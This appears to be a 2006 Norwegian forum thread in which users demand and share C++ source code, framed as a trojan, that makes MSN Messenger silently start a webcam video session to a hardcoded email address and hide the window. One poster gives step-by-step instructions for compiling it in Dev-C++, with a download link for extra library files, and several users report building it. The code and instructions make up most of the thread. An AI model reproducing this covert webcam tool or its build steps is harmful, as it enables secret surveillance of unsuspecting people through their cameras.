Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  75 14273
Tuxern, legg ut kildekode.. Ellers tror jeg ikke du har lagt et slikt virus.
ja legg ut kildekode...
Jeg trur ikke på detta! Legg ut kildekode du tuxern! Lite vits i å holde diskusjonen oppe på dette "du har laga" hvis du alikavel ikke gir det bort! Hvis du i det hele tatt har laget det dah! *tviler*
Jeg har faktisk stor tro på dette. Det bør vel være en mulighet for å lage noe sånt. Så hvis Tuxern faktisk sier han har laget det så bør det vel ikke være noen grunn til å tvile. Og litt dumt å legge ut kildekoden hvis han har bygd det selv og ikke vil at noen skal bygge videre på det. Tenk hva som skjer hvis alle begynner å bruke programmet da. Da vil jo media til slutt få vite om dette, og man vil etterhvert ikke godta å ha msn-samtaler fordi man er redde for å bli sett på.
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av Lanka
Jeg har faktisk stor tro på dette. Det bør vel være en mulighet for å lage noe sånt. Så hvis Tuxern faktisk sier han har laget det så bør det vel ikke være noen grunn til å tvile. Og litt dumt å legge ut kildekoden hvis han har bygd det selv og ikke vil at noen skal bygge videre på det. Tenk hva som skjer hvis alle begynner å bruke programmet da. Da vil jo media til slutt få vite om dette, og man vil etterhvert ikke godta å ha msn-samtaler fordi man er redde for å bli sett på.
Vis hele sitatet...
Du har ikkje peiling på programmering hører eg. Det bør vel vere en mulighet? Javel, så har msn et sikkerhetshol. Langt fra utenkjeleg, men at MS ikkje veit om det, og at det ikkje er patcha, hørest rarare ut. Og om andre byggjer viare på det, kva har han tapt med mindre han har tenkt å selje det? Og det verste som skjer er at MS lager patch til det.
Ergo: trur ikkje på det før eg har lest kildekoden.
Sitat av slashdot
Du har ikkje peiling på programmering hører eg. Det bør vel vere en mulighet? Javel, så har msn et sikkerhetshol. Langt fra utenkjeleg, men at MS ikkje veit om det, og at det ikkje er patcha, hørest rarare ut. Og om andre byggjer viare på det, kva har han tapt med mindre han har tenkt å selje det? Og det verste som skjer er at MS lager patch til det.
Ergo: trur ikkje på det før eg har lest kildekoden.
Vis hele sitatet...
Hva har mine programmeringsevner å gjøre med at jeg har tro på at noe sånt virkelig kan være ekte? Det å lage et program som inviterer til webcam og lynraskt "lukker" vinduet sånn at det tilsynelatende blir borte, er vel ikke så vanskelig å tro skal være mulig å få til. Men tror det er bedre å ha tro på at det funker uten å ha evner innenfor programmering. Enn å ha peil på C++ og ikke tro på programmet, for så å forstå at det virkelig går ann. Min mening er at jeg tror det skal være mulig. Har ingenting med at jeg har peiling eller ikke.
Slashdot gjør meg så forbanna at jeg velger å legge ut allmen kildekode.

Kode

{
#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;

CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger);  

cName = "dadyd@online.no";

BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
   
vName.vt = VT_BSTR;
vName.bstrVal  = (BSTR)pbstrName;
   
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();

// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
         
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);

pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}
Sist endret av mainer; 7. juni 2006 kl. 19:42.
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av mainer
Slashdot gjør meg så forbanna at jeg velger å legge ut allmen kildekode.
Vis hele sitatet...
Takker. Eg er skeptisk av natur Ikkje noko personleg!
kan denne kjilde koden gjøre at du får programet?
beklager hvis dere syntes jeg er en helt for jævlig stor noob men jeg har virkelig gosdt inn for og prøve og bli god i data så jeg må jo stile spørsmål=)
Du må skriv inn denne i et c++ program. Feks Dev-C++
http://www.bloodshed.net/download.html

Der er en link til ett gratis kodeprogram som heter dev-c++, som tuxeren har brukt for å lage trojaneren. Når dere har lastet ned programmet så start det. (Ja faktisk)
trykk på arkiv -> nytt prosjekt.
Velg windows application, da kommer det opp hvor dere vil lagre programmet.
Pass på at alle filer kommer i samme mappe.
Når dere har gjort det så kommer det til å komme opp masse tekst til høyre i dev-c++
ta bort all tekst så at det er rent i ruten. Kopier deretter:

Kode:

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;

CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger); *

cName = "din e-mail";

BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
* *
vName.vt = VT_BSTR;
vName.bstrVal *= (BSTR)pbstrName;
* *
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();

// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
* * * * *
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);

pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}


Når dere har kopiert inn teksten skal dere trykke på: prosjekt-> prosjekt alternativer. Da kommer det opp en rute der dere skal velge paramantere.

Trykk på knappen "legg till bibliotek" og bla dit du instalerte dev-c++ (C:/dev-cpp/) i den mappen finns det en mappe som heter lib,
gå inn i den og markere "libole32.a" og "liboleaut32.a" og trykk åpne.
Når dere har gjort det skal dere legge til enda en .lib fil som finnes på:

http://www.msghelp.net/attachment.php?pid=280776

Last ned filene og legg de i samme mappe som allt det andre
klikk på legg til bibliotek igjen og bla fram til mappen der du lagret alt og der ska filene ligge som du nettopp lastet ned. markere "msgrguid.lib" og trykk på legg till.

Nå skal dere legga til de andre to filene som fantes med i mappen dere lastet ned.
Til venstre i dev-c++ programmet så finnes det ett fil-tre, høyreklikk på den øverste mappen som *"main.cpp" ligger i og velg "legg til prosjekt" gå deretter til mappen der alt ligger og marker "msgrua.h" og "msgruid.h" og velg åpne.

Nå skal programmet være klart til å komplimeres. Trykk på komplimer (en knapp med fire ruter på) eller ctrl+f11. Lagre fila i samme mappe.
Nå skal fila være klar.

Om det blir noe feil kan det være fordi filene ikke er i samme mappe.

Om fila fungerer skal det finnes to rader med tekst der det står:
.drectv`-default:uuid.lib ' unrecognized
.drectv`-default:uuid.lib ' unrecognized

Der det i kilden står "Din e-mail" må du sette inn din epost.

Takk til Tuxeren! Jeg har ikke gjort noe som helst.
Sist endret av mainer; 7. juni 2006 kl. 20:16.
Respect! Om det funker eller ei. Uansett om det hadde funka hadde jeg blitt ganske happy!
Trodde poenget var at dere hadde laget noe selv og ikke 'ståjlet' noe du hadde funnet på nett...
Sitat av HANsY Tha DJ
kan denne kjilde koden gjøre at du får programet?
beklager hvis dere syntes jeg er en helt for jævlig stor noob men jeg har virkelig gosdt inn for og prøve og bli god i data så jeg må jo stile spørsmål=)
Vis hele sitatet...
Det kommer ann på om du gjør det rett, men i utgangspunktet skal det bli et program av det ja.
er dette programmet blitt teset enda?
Sitat av Goophy
Trodde poenget var at dere hadde laget noe selv og ikke 'ståjlet' noe du hadde funnet på nett...
Vis hele sitatet...
Noen liker å skryte på seg vettu

HANsY Tha DJ: I følge de andre plassene denne kildekoden ligger så fungerer den ja...
har ikke det alternativet jeg.
jeg har bare

Library - der kan jeg endre ikoner
Browse - velge en ferdig fil
Remove - slette fil.
Sist endret av HANsY Tha DJ; 7. juni 2006 kl. 20:28.
Ikke last ned beta version...
Det er beta versjonen jeg brukte da jeg lagte programmet...
Joho!! jeg greide det.. skal nå teste
Sist endret av MiNOx; 7. juni 2006 kl. 20:42.
Sitat av MiNOx
Joho!! jeg greide det.. skal nå teste
Vis hele sitatet...
eyy hvordan?:P
har enda ikke skjønt det:P
Sist endret av HANsY Tha DJ; 7. juni 2006 kl. 20:50.
Faen så vanskelig det skulle være :P
Nah!!! Det var enkelt.. det var enklere med den engelske versjonen synes nå jeg.
dette er jo gammelt da. husker jeg så den på et forum for godt over et år tilbake. probleme med denne er at du kan ikke chatte med vedkommende samtidig som du har sendt "programmet"/trojanen til. siden den sjuler chatte/msn vinduet rett etter den har sender webcameraet.
den fungerer men er ikke helt optimal.
forklar da!!(20 fucka tegn)
Stengt. PM meg hvis dere har noe nytt og ordentlig å komme med.